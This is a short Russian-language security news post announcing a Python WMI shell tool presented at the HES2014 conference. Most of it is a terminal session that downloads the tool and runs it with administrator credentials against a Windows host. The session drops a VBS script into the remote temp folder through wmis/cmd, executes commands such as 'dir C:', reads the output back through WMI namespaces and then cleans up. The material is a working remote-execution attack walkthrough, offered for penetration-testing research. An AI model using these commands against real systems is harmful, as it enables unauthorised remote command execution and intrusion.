[hacking tricks] Полноценный WMI shell

[hacking tricks] Полноценный WMI shell
Усилиями Andrei Dumitrescu появился полноценный WMI шелл на Python. Тула разработана в контексте выступления Andrei's на проходящем сейчас мероприятии #HES2014 [ http://2014.hackitoergosum.org/ ].

Ознакомиться с презентацией можно по следующей ссылке [ тынц ].

root@bt: ~

root@bt:/tmp# wget https://www.lexsi.fr/conference/wmi-shell.zip
root@bt:/tmp# unzip wmi-shell.zip
Archive: wmi-shell.zip
creating: wmi-shell/
inflating: wmi-shell/LICENSE
inflating: wmi-shell/wmi-shell.py
inflating: wmi-shell/README
inflating: wmi-shell/base.vbs
creating: wmi-shell/bin/
inflating: wmi-shell/bin/base64.c
inflating: wmi-shell/bin/base64.exe
inflating: wmi-shell/bin/wmis
inflating: wmi-shell/bin/wmic
creating: wmi-shell/b64-source/
inflating: wmi-shell/b64-source/base64.exe
inflating: wmi-shell/b64-source/base64.c
root@bt:/tmp# cd wmi-shell/
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134
Sending our VBS script to 10.1.37.134 ETA: ~6.4 seconds.
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
...
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select >>%TEMP%E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
>>> dir C:
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%E2BpK7z.vbs "dir C:"" 2>/dev/null <-- . Returned code: 1
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='rootdefault' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
waiting for command output . . Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='rootdefault' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
. done !
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='rootdefault' "select Name from __Namespace where Name like 'EVILTAG%'" > bSKFiy5.tmp <-- . Returned code: 0
Volume in drive C has no label.
Volume Serial Number is 8E25-9E63

Directory of C:

14.07.2009 07:20 <DIR> PerfLogs
19.04.2014 03:12 <DIR> Program Files
19.04.2014 22:04 <DIR> Program Files (x86)
19.04.2014 03:05 <DIR> Users
20.04.2014 04:19 <DIR Windows
0 File(s) 0 bytes
5 Dir(s) 82▒326▒290▒432 bytes free
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%E2BpK7z.vbs "cleanup"" 2>/dev/null <-- . Returned code: 1
>>>

Alt text

Подписывайтесь на каналы "SecurityLab" в TelegramTelegram и TwitterTwitter, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.